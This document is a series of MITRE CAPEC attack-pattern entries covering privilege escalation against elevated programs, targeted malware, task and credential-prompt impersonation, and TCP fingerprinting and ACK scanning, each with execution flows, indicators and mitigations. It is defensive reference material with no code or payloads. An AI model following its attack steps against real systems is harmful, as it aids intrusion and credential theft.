Modification Date	Modifier	Organization
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description

CAPEC-69: Target Programs with Elevated Privileges

Attack Pattern ID: 69

Abstraction: Standard

View customized information:

Description

This attack targets programs running with elevated privileges. The adversary tries to leverage a vulnerability in the running program and get arbitrary code to execute with elevated privileges.

Likelihood Of Attack

High

Typical Severity

Very High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	233	Privilege Escalation
CanPrecede	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	8	Buffer Overflow in an API Call
CanPrecede	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	9	Buffer Overflow in Local Command-Line Utilities
CanPrecede	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	10	Buffer Overflow via Environment Variables
CanPrecede	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	67	String Format Overflow in syslog()

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Subvert Access Control

Execution Flow

Explore

Find programs with elevated priveleges: The adversary probes for programs running with elevated privileges.

Techniques
Look for programs that write to the system directories or registry keys (such as HKLM, which stores a number of critical Windows environment variables). These programs are typically running with elevated privileges and have usually not been designed with security in mind. Such programs are excellent exploit targets because they yield lots of power when they break.

Find vulnerability in running program: The adversary looks for a vulnerability in the running program that would allow for arbitrary code execution with the privilege of the running program.

Techniques
Look for improper input validation
Look for improper failure safety. For instance when a program fails it may authorize restricted access to anyone.
Look for a buffer overflow which may be exploited if an adversary can inject unvalidated data.

Exploit

Execute arbitrary code: The adversary exploits the vulnerability that they have found. For instance, they can try to inject and execute arbitrary code or write to OS resources.

Prerequisites

The targeted program runs with elevated OS privileges.

The targeted program accepts input data from the user or from another program.

The targeted program is giving away information about itself. Before performing such attack, an eventual attacker may need to gather information about the services running on the host target. The more the host target is verbose about the services that are running (version number of application, etc.) the more information can be gather by an attacker.

This attack often requires communicating with the host target services directly. For instance Telnet may be enough to communicate with the host target.

Skills Required

[Level: Low]

An attacker can use a tool to scan and automatically launch an attack against known issues. A tool can also repeat a sequence of instructions and try to brute force the service on the host target, an example of that would be the flooding technique.

[Level: Medium]

More advanced attack may require knowledge of the protocol spoken by the host service.

Indicators

The log can have a trace of abnormal activity. Also if abnormal activity is detected on the host target. For instance flooding should be seen as abnormal activity and the target host may decide to take appropriate action in order to mitigate the attack (data filtering or blocking). Resource exhaustion is also a sign of abnormal activity.

Consequences

Scope	Impact	Likelihood
Confidentiality Integrity Availability	Execute Unauthorized Commands
Confidentiality Access Control Authorization	Gain Privileges
Availability	Resource Consumption

Mitigations

Apply the principle of least privilege.

Validate all untrusted data.

Apply the latest patches.

Scan your services and disable the ones which are not needed and are exposed unnecessarily. Exposing programs increases the attack surface. Only expose the services which are needed and have security mechanisms such as authentication built around them.

Avoid revealing information about your system (e.g., version of the program) to anonymous users.

Make sure that your program or service fail safely. What happen if the communication protocol is interrupted suddenly? What happen if a parameter is missing? Does your system have resistance and resilience to attack? Fail safely when a resource exhaustion occurs.

If possible use a sandbox model which limits the actions that programs can take. A sandbox restricts a program to a set of privileges and commands that make it difficult or impossible for the program to cause any damage.

Check your program for buffer overflow and format String vulnerabilities which can lead to execution of malicious code.

Monitor traffic and resource usage and pay attention if resource exhaustion occurs.

Protect your log file from unauthorized modification and log forging.

Related Weaknesses

CWE-ID	Weakness Name
250	Execution with Unnecessary Privileges
15	External Control of System or Configuration Setting

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-1] G. Hoglund and G. McGraw. "Exploiting Software: How to Break Code". Addison-Wesley. 2004-02.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated References
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Related_Attack_Patterns
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attacker_Skills_or_Knowledge_Required, References
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Execution_Flow, Related_Attack_Patterns
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Weaknesses
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)	Updated Description, Execution_Flow, Prerequisites

CAPEC-542: Targeted Malware

Attack Pattern ID: 542

Abstraction: Standard

View customized information:

Description

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	549	Local Execution of Code
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	550	Install New Service
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	551	Modify Existing Service
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	552	Install Rootkit
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	556	Replace File Extension Handlers
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	558	Replace Trusted Executable
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	564	Run Software at Logon
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	579	Replace Winlogon Helper DLL
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	698	Install Malicious Extension
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	475	Signature Spoofing by Improper Validation
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	662	Adversary in the Browser (AiTB)

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Inject Unexpected Items

Indicators

Software being run on a system matches a file signature found in a malware database

A suspicious module is loaded that is not regularly loaded by a system

Software on a system is making calls to "GetProcAddress()" which is a commonly used function to implement dynamic API resolution

Related Weaknesses

Notes

Other

Adversaries often utilize obfuscation techniques when developing malware with the purpose of either avoiding detection or prevent the target from reverse engineering and understanding a captured malware sample. Some of these techniques include, but are not limited to, binary padding, software packing, stripping symbols and strings from a payload, and utilizing dynamic API resolution.

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1587.001	Develop Capabilities: Malware
1027	Obfuscated Files or Information

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Related_Attack_Patterns
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated References
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Taxonomy_Mappings
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Attack_Patterns
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings
2023-01-24 (Version 3.9)	CAPEC Content Team	The MITRE Corporation
2023-01-24 (Version 3.9)	Updated Indicators, Notes, Taxonomy_Mappings

CAPEC-504: Task Impersonation

Attack Pattern ID: 504

Abstraction: Standard

View customized information:

Description

An adversary, through a previously installed malicious application, impersonates an expected or routine task in an attempt to steal sensitive information or leverage a user's privileges.

Extended Description

When impersonating an expected task, the adversary monitors the task list maintained by the operating system and waits for a specific legitimate task to become active. Once the task is detected, the malicious application launches a new task in the foreground that mimics the user interface of the legitimate task. At this point, the user thinks that they are interacting with the legitimate task that they started, but instead they are interacting with the malicious application. Once the adversary's goal is reached, the malicious application can exit, leaving the original trusted application visible and the appearance that nothing out of the ordinary has occurred.

A second approach entails the adversary impersonating an unexpected task, but one that may often be spawned by legitimate background processes. For example, an adversary may randomly impersonate a system credential prompt, implying that a background process requires authentication for some purpose. The user, believing they are interacting with a legitimate task, enters their credentials or authorizes the use of their stored credentials, which the adversary then leverages for nefarious purposes. This type of attack is most often used to obtain sensitive information (e.g., credentials) from the user, but may also be used to ride the user's privileges.

Likelihood Of Attack

Medium

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	173	Action Spoofing
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	654	Credential Prompt Impersonation

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Engage in Deceptive Interactions

Execution Flow

Explore

Determine suitable tasks to exploit: Determine what tasks exist on the target system that may result in a user providing sensitive information.
Techniques
Determine what tasks prompt a user for their credentials.
Determine what tasks may prompt a user to authorize a process to execute with elevated privileges.

Exploit

Impersonate Task: Impersonate a legitimate task, either expected or unexpected, in an attempt to gain user credentials or to ride the user's privileges.

Techniques
Prompt a user for their credentials, while making the user believe the credential request is legitimate.
Prompt a user to authorize a task to run with elevated privileges, while making the user believe the request is legitimate.

Prerequisites

The adversary must already have access to the target system via some means.

A legitimate task must exist that an adversary can impersonate to glean credentials.

The user's privileges allow them to execute certain tasks with elevated privileges.

Skills Required

[Level: Low]

Once an adversary has gained access to the target system, impersonating a task is trivial.

Resources Required

Malware or some other means to initially comprise the target system.

Additional malware to impersonate a legitimate task.

Indicators

Credential or permission elevation prompts that appear illegitimate or unexpected.

Consequences

Scope	Impact	Likelihood
Access Control Authentication	Gain Privileges

Mitigations

Example Instances

An adversary prompts a user to authorize an elevation of privileges, implying that a background task needs additional permissions to execute. The user accepts the privilege elevation, allowing the adversary to execute additional malware or tasks with the user's privileges.

Related Weaknesses

CWE-ID	Weakness Name
1021	Improper Restriction of Rendered UI Layers or Frames

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1036.004	Masquerading: Masquerade Task or Service

References

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated References
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated @Abstraction, @Status, Consequences, Description, Example_Instances, Execution_Flow, Indicators, Likelihood_Of_Attack, Mitigations, Prerequisites, Resources_Required, Skills_Required, Typical_Severity
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings

CAPEC-328: TCP 'RST' Flag Checksum Probe

Attack Pattern ID: 328

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Medium

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	312	Active OS Fingerprinting

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card.

Resources Required

A tool capable of sending and receiving packets from a remote system.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data
Confidentiality Access Control Authorization	Bypass Protection Mechanism Hide Activities

Related Weaknesses

CWE-ID	Weakness Name
200	Exposure of Sensitive Information to an Unauthorized Actor

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-33] Stuart McClure, Joel Scambray and George Kurtz. "Hacking Exposed: Network Security Secrets & Solutions". Chapter 2: Scanning, pg. 56. 6th Edition. McGraw Hill. 2009.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Related_Attack_Patterns, Resources_Required, Typical_Likelihood_of_Exploit
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Related_Weaknesses

CAPEC-323: TCP (ISN) Counter Rate Probe

Attack Pattern ID: 323

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Medium

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	312	Active OS Fingerprinting

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card.

Resources Required

A tool capable of sending and receiving packets from a remote system.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data
Confidentiality Access Control Authorization	Bypass Protection Mechanism Hide Activities

Related Weaknesses

CWE-ID	Weakness Name
200	Exposure of Sensitive Information to an Unauthorized Actor

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-33] Stuart McClure, Joel Scambray and George Kurtz. "Hacking Exposed: Network Security Secrets & Solutions". Chapter 2: Scanning, pg. 56. 6th Edition. McGraw Hill. 2009.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Related_Attack_Patterns, Resources_Required, Typical_Likelihood_of_Exploit
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Related_Weaknesses

CAPEC-322: TCP (ISN) Greatest Common Divisor Probe

Attack Pattern ID: 322

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Medium

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	312	Active OS Fingerprinting

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card.

Resources Required

A tool capable of sending and receiving packets from a remote system.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data
Confidentiality Access Control Authorization	Bypass Protection Mechanism Hide Activities

Related Weaknesses

CWE-ID	Weakness Name
200	Exposure of Sensitive Information to an Unauthorized Actor

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-33] Stuart McClure, Joel Scambray and George Kurtz. "Hacking Exposed: Network Security Secrets & Solutions". Chapter 2: Scanning, pg. 56. 6th Edition. McGraw Hill. 2009.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Related_Attack_Patterns, Resources_Required, Typical_Likelihood_of_Exploit
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Related_Weaknesses

CAPEC-324: TCP (ISN) Sequence Predictability Probe

Attack Pattern ID: 324

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Medium

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	312	Active OS Fingerprinting

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card.

Resources Required

A tool capable of sending and receiving packets from a remote system.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data
Confidentiality Access Control Authorization	Bypass Protection Mechanism Hide Activities

Related Weaknesses

CWE-ID	Weakness Name
200	Exposure of Sensitive Information to an Unauthorized Actor

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-33] Stuart McClure, Joel Scambray and George Kurtz. "Hacking Exposed: Network Security Secrets & Solutions". Chapter 2: Scanning, pg. 56. 6th Edition. McGraw Hill. 2009.

[REF-130] Gordon "Fyodor" Lyon. "The Art of Port Scanning". Volume: 7, Issue. 51. Phrack Magazine. 1997. <http://phrack.org/issues/51/11.html>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Related_Attack_Patterns, Resources_Required, Typical_Likelihood_of_Exploit
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated References, Related_Weaknesses

CAPEC-297: TCP ACK Ping

Attack Pattern ID: 297

Abstraction: Detailed

View customized information:

Description

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	292	Host Discovery

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

The ability to send an ACK packet to a remote host and identify the response. Creating the ACK packet without building a full connection requires the use of raw sockets. As a result, it is not possible to send a TCP ACK ping from some systems (Windows XP SP 2) without the use of third-party packet drivers like Winpcap. On other systems (BSD, Linux) administrative privileges are required in order to write to the raw socket.

The target must employ a stateless firewall that lacks a rule set that rejects unsolicited ACK packets.

The adversary requires the ability to craft custom TCP ACK segments for use during network reconnaissance. Sending an ACK ping requires the ability to access "raw sockets" in order to create the packets with direct access to the packet header.

Resources Required

ACK scanning can be performed via the use of a port scanner or by raw socket manipulation using a scripting or programming language. Packet injection tools are also useful for this purpose. Depending upon the technique used it may also be necessary to sniff the network in order to see the response.

Consequences

Scope	Impact	Likelihood
Confidentiality	Other
Confidentiality Access Control Authorization	Bypass Protection Mechanism Hide Activities

Mitigations

Leverage stateful firewalls that allow for the rejection of a packet that is not part of an existing connection.

Related Weaknesses

CWE-ID	Weakness Name
200	Exposure of Sensitive Information to an Unauthorized Actor

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-33] Stuart McClure, Joel Scambray and George Kurtz. "Hacking Exposed: Network Security Secrets & Solutions". Chapter 2: Scanning, pg. 49. 6th Edition. McGraw Hill. 2009.

[REF-34] Gordon "Fyodor" Lyon. "Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning". Section 3.6.2 TCP ACK Ping, pg. 61. 3rd "Zero Day" Edition,. Insecure.com LLC, ISBN: 978-0-9799587-1-7. 2008.

[REF-125] Mark Wolfgang. "Host Discovery with Nmap". 2002-11. <http://nmap.org/docs/discovery.pdf>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Prerequisites, Description, Description Summary, Related_Weaknesses, Resources_Required, Solutions_and_Mitigations
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns

CAPEC-305: TCP ACK Scan

Attack Pattern ID: 305

Abstraction: Detailed

View customized information:

Description

Extended Description

When a TCP ACK segment is sent to a closed port, or sent out-of-sync to a listening port, the RFC 793 expected behavior is for the device to respond with a RST. Getting RSTs back in response to a ACK scan gives the attacker useful information that can be used to infer the type of firewall present. Stateful firewalls will discard out-of-sync ACK packets, leading to no response. When this occurs the port is marked as filtered. When RSTs are received in response, the ports are marked as unfiltered, as the ACK packets solicited the expected behavior from a port. When combined with SYN techniques an attacker can gain a more complete picture of which types of packets get through to a host and thereby map out its firewall rule-set. ACK scanning, when combined with SYN scanning, also allows the adversary to analyze whether a firewall is stateful or non-stateful (described in notes). TCP ACK Scans are somewhat faster and more stealthy than other types of scans but often requires rather sophisticated analysis by an experienced person. A skilled adversary may use this method to map out firewall rules, but the results of ACK scanning will be less useful to a novice.

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	300	Port Scanning

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Collect and Analyze Information

Execution Flow

Experiment

An adversary sends TCP packets with the ACK flag set and that are not associated with an existing connection to target ports.
An adversary uses the response from the target to determine the port's state. If a RST packet is received the target port is either closed or the ACK was sent out-of-sync. If no response is received, the target is likely using a stateful firewall.

Prerequisites

The adversary requires logical access to the target network. ACK scanning requires the use of raw sockets, and thus cannot be performed from some Windows systems (Windows XP SP 2, for example). On Unix and Linux, raw socket manipulations require root privileges.

Resources Required

This attack can be achieved via the use of a network mapper or scanner, or via raw socket programming in a scripting language. Packet injection tools are also useful for this purpose. Depending upon the method used it may be necessary to sniff the network in order to see the response.

Consequences

Scope	Impact	Likelihood
Confidentiality	Other
Confidentiality Access Control Authorization	Bypass Protection Mechanism Hide Activities

Related Weaknesses

CWE-ID	Weakness Name
200	Exposure of Sensitive Information to an Unauthorized Actor

Notes

Other

If a SYN solicits a SYN/ACK or a RST and an ACK solicits a RST, the port is unfiltered by any firewall type. If a SYN solicits a SYN/ACK, but an ACK generates no response, the port is statefully filtered. When a SYN generates neither a SYN/ACK or a RST, but an ACK generates a RST, the port is statefully filtered. When neither SYN nor ACK generates any response, the port is blocked by a specific firewall rule, which can occur via any type of firewall.

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-33] Stuart McClure, Joel Scambray and George Kurtz. "Hacking Exposed: Network Security Secrets & Solutions". Chapter 2: Scanning, pg. 55-56. 6th Edition. McGraw Hill. 2009.

[REF-34] Gordon "Fyodor" Lyon. "Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning". Section 5.7 TCP ACK Scan, pg. 113. 3rd "Zero Day" Edition,. Insecure.com LLC, ISBN: 978-0-9799587-1-7. 2008.

[REF-130] Gordon "Fyodor" Lyon. "The Art of Port Scanning". Volume: 7, Issue. 51. Phrack Magazine. 1997. <http://phrack.org/issues/51/11.html>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
